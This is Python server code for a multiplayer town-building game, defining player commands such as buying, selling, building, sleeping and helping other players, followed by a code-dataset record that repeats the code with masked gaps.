self._tile = tile
self._building_process = building_process
def _check(self):
player = self.town.get_player(self.client_id)
AvailableCheck(player).check(self.check_result)
if self._tile not in self.town.buildings:
self.check_result += "No building on {}".format(self._tile)
return
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
InventoryRemoveCheck(
building.inventory, self._building_process.item_required
).check(self.check_result)
InventoryAddCheck(building.inventory, self._building_process.item_result).check(
self.check_result
)
EnergyCheck(player, self._building_process.energy_required).check(
self.check_result
)
def _do(self):
building = self.town.buildings[self._tile]
building.inventory.remove_item(self._building_process.item_required)
building.inventory.add_item(self._building_process.item_result)
player = self.town.get_player(self.client_id)
player.energy.value -= self._building_process.energy_required
def __repr__(self):
msg = "BuildingProcessCommand ServerCommand {}".format(self._building_process)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict):
return cls(
json_dict["tile"],
BuildingProcess.from_json_dict(json_dict["building_process"]),
)
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "building_process"
json_dict["tile"] = self._tile
json_dict["building_process"] = self._building_process.to_json_dict()
return json_dict
class BuyCommand(ServerCommand):
def __init__(self, tile: tuple, transaction: BuildingTransaction):
ServerCommand.__init__(self)
self._tile = tile
self._transaction = transaction
def _check(self):
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
item = Item(self._transaction.item_name, 1)
AvailableCheck(player).check(self.check_result)
TransactionCheck(building, player, item).check(self.check_result)
def _do(self):
item = Item(self._transaction.item_name, 1)
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
building.inventory.remove_item(item)
player.inventory.add_item(item)
def __repr__(self):
msg = "BuyCommand ServerCommand {}".format(self._transaction.item_name)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict):
return cls(
json_dict["tile"],
BuildingTransaction.from_json_dict(json_dict["transaction"]),
)
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "buy"
json_dict["tile"] = self._tile
json_dict["transaction"] = self._transaction.to_json_dict()
return json_dict
class SellCommand(ServerCommand):
def __init__(self, tile: tuple, transaction: BuildingTransaction):
ServerCommand.__init__(self)
self._tile = tile
self._transaction = transaction
def _check(self):
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
item = Item(self._transaction.item_name, 1)
AvailableCheck(player).check(self.check_result)
TransactionCheck(player, building, item).check(self.check_result)
def _do(self):
item = Item(self._transaction.item_name, 1)
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
building.inventory.add_item(item)
player.inventory.remove_item(item)
def __repr__(self):
msg = "SellCommand ServerCommand {}".format(self._transaction.item_name)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict):
return cls(
json_dict["tile"],
BuildingTransaction.from_json_dict(json_dict["transaction"]),
)
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "sell"
json_dict["tile"] = self._tile
json_dict["transaction"] = self._transaction.to_json_dict()
return json_dict
class BuildBuildingCommand(ServerCommand):
ENERGY_COST = 20
def __init__(self, tile: tuple, item: Item):
ServerCommand.__init__(self)
self._item = item
self._tile = tile
def _check(self):
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
AvailableCheck(player).check(self.check_result)
EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.check_result)
TransactionCheck(building, building, self._item).check(self.check_result)
def _do(self):
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
player.energy.value -= BuildBuildingCommand.ENERGY_COST
building.inventory.remove_item(self._item)
building.construction_inventory.add_item(self._item)
def __repr__(self):
msg = "Build Building ServerCommand {}".format(self._item)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict):
return cls(json_dict["tile"], Item.from_json_dict(json_dict["item"]))
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "build_building"
json_dict["tile"] = self._tile
json_dict["item"] = self._item.to_json_dict()
return json_dict
class UpgradeBuildingCommand(ServerCommand):
def __init__(self, tile: tuple):
ServerCommand.__init__(self)
self._tile = tile
def _check(self):
building = self.town.buildings[self._tile]
player = self.town.get_player(self.client_id)
AvailableCheck(player).check(self.check_result)
if not building.construction_inventory.is_full():
self.check_result += "construction not finished"
def _do(self):
building = self.town.buildings[self._tile]
building.upgrade()
def __repr__(self):
msg = "Upgrade Building ServerCommand {}".format(self._tile)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict):
return cls(json_dict["tile"])
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "upgrade_building"
json_dict["tile"] = self._tile
return json_dict
class SleepCommand(ServerCommand):
ENERGY_REGEN_IN_HOUSE = 4
ENERGY_REGEN_IN_GROUND = 2
def __init__(self):
ServerCommand.__init__(self)
def _check(self):
tile = self.town.get_player_tile(self.client_id)
# Player not in building
if tile in self.town.buildings and self.town.buildings[tile].name != "cabane":
self.check_result += "Can't sleep in building"
def _do(self):
player = self.town.get_player(self.client_id)
tile = self.town.get_player_tile(self.client_id)
# Change player sprite
player.status = "sleep"
player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND
# Change energy regeneration depending on where he sleeps
if tile in self.town.buildings and self.town.buildings[tile].name == "cabane":
player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE
def __repr__(self):
msg = "Sleep command. Player id: {}".format(self.client_id)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict: dict) -> SleepCommand:
return cls()
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "sleep"
return json_dict
class WakeUpCommand(ServerCommand):
def __init__(self):
ServerCommand.__init__(self)
def _check(self):
player = self.town.get_player(self.client_id)
is_awaken_check = CheckResult()
AwakenCheck(player).check(is_awaken_check)
if is_awaken_check:
self.check_result += "{} is already awake".format(player.name)
def _do(self):
player = self.town.get_player(self.client_id)
player.status = "idle"
player.energy.reset_regen()
def __repr__(self):
msg = "Wake up command. Player id: {}".format(self.client_id)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict: dict) -> WakeUpCommand:
return cls()
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "wakeup"
return json_dict
class HelpPlayerCommand(ServerCommand):
ENERGY_TO_HELP = 20
HEALTH_TO_GIVE = 1
def __init__(self, player_to_help_id):
ServerCommand.__init__(self)
self._player_to_help_id = player_to_help_id
def _check(self):
player = self.town.get_player(self.client_id)
AvailableCheck(player).check(self.check_result)
# The two players id exists in the town ?
if self.client_id not in self.town.players.keys():
self.check_result += "Player {} does not exist".format(self.client_id)
return
if self._player_to_help_id not in self.town.players.keys():
self.check_result += "Player {} does not exist".format(
self._player_to_help_id
)
return
# Check if the two players are in the same tile
if self.town.get_player_tile(self.client_id) != self.town.get_player_tile(
self._player_to_help_id
):
self.check_result += "Players {} and {} are not in the same tile".format(
self.client_id, self._player_to_help_id
)
return
# Check if I have enough energy to help
EnergyCheck(
self.town.get_player(self.client_id), HelpPlayerCommand.ENERGY_TO_HELP
).check(self.check_result)
# Check if patient doesn't have health
is_alive_check = CheckResult()
AvailableCheck(self.town.get_player(self._player_to_help_id)).check(
is_alive_check
)
if is_alive_check:
self.check_result += "{} has enough health to keep moving".format(
self._player_to_help_id
)
def _do(self):
player_helper = self.town.get_player(self.client_id)
player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP
player_to_help = self.town.get_player(self._player_to_help_id)
player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE
def __repr__(self):
msg = "HelpPlayerCommand: try to help {}".format(self._player_to_help_id)
if not self.check_result:
msg += "\n{}".format(self.check_result)
return msg
@classmethod
def from_json_dict(cls, json_dict: dict) -> HelpPlayerCommand:
return cls(json_dict["player_to_help_id"])
def to_json_dict(self):
json_dict = super().to_json_dict()
json_dict["command"] = "help"
json_dict["player_to_help_id"] = self._player_to_help_id
return json_dict
class CommandsFactory:
COMMANDS_DICT = {}
COMMANDS_DICT["move"] = MovePlayerCommand
COMMANDS_DICT["build"] = BuildCommand
COMMANDS_DICT["collect"] = CollectResourceCommand
COMMANDS_DICT["building_process"] = BuildingProcessCommand
COMMANDS_DICT["buy"] = BuyCommand
COMMANDS_DICT["sell"] = SellCommand
COMMANDS_DICT["build_building"] = BuildBuildingCommand
COMMANDS_DICT["upgrade_building"] = UpgradeBuildingCommand
COMMANDS_DICT["help"] = HelpPlayerCommand
COMMANDS_DICT["sleep"] = SleepCommand
COMMANDS_DICT["wakeup"] = WakeUpCommand
@staticmethod
def from_podsixnet(podsixnet_dict):
if podsixnet_dict["command"] in CommandsFactory.COMMANDS_DICT:
command = CommandsFactory.COMMANDS_DICT[
podsixnet_dict["command"]
].from_json_dict(podsixnet_dict)
else:
raise NotImplementedError
command.client_id = podsixnet_dict["client_id"]
command.check_result = CheckResult.from_json_dict(
podsixnet_dict["check_result"]
)
return command
|
normal
|
{
"blob_id": "22b9868063d6c5fc3f8b08a6e725fff40f4a1a03",
"index": 3886,
"step-1": "<mask token>\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-2": "<mask token>\n\n\nclass BuildCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_name = building_name\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->BuildCommand:\n return cls(json_dict['tile'], json_dict['building_name'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build'\n json_dict['building_name'] = self._building_name\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.resources:\n self.check_result += 'No resource in {}'.format(self._tile)\n return\n resource = self.town.resources[self._tile]\n TransactionCheck(resource, player, self._item).check(self.check_result)\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.\n check_result)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = 'Collect Resource ServerCommand : {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->CollectResourceCommand:\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self) ->dict:\n json_dict = super().to_json_dict()\n json_dict['command'] = 'collect'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self._tile not in self.town.buildings:\n self.check_result += 'No building on {}'.format(self._tile)\n return\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n InventoryRemoveCheck(building.inventory, self._building_process.\n item_required).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.\n item_result).check(self.check_result)\n EnergyCheck(player, self._building_process.energy_required).check(self\n .check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 'BuildingProcessCommand ServerCommand {}'.format(self.\n _building_process)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingProcess.from_json_dict(\n json_dict['building_process']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'building_process'\n json_dict['tile'] = self._tile\n json_dict['building_process'] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = 'BuyCommand ServerCommand {}'.format(self._transaction.item_name)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass 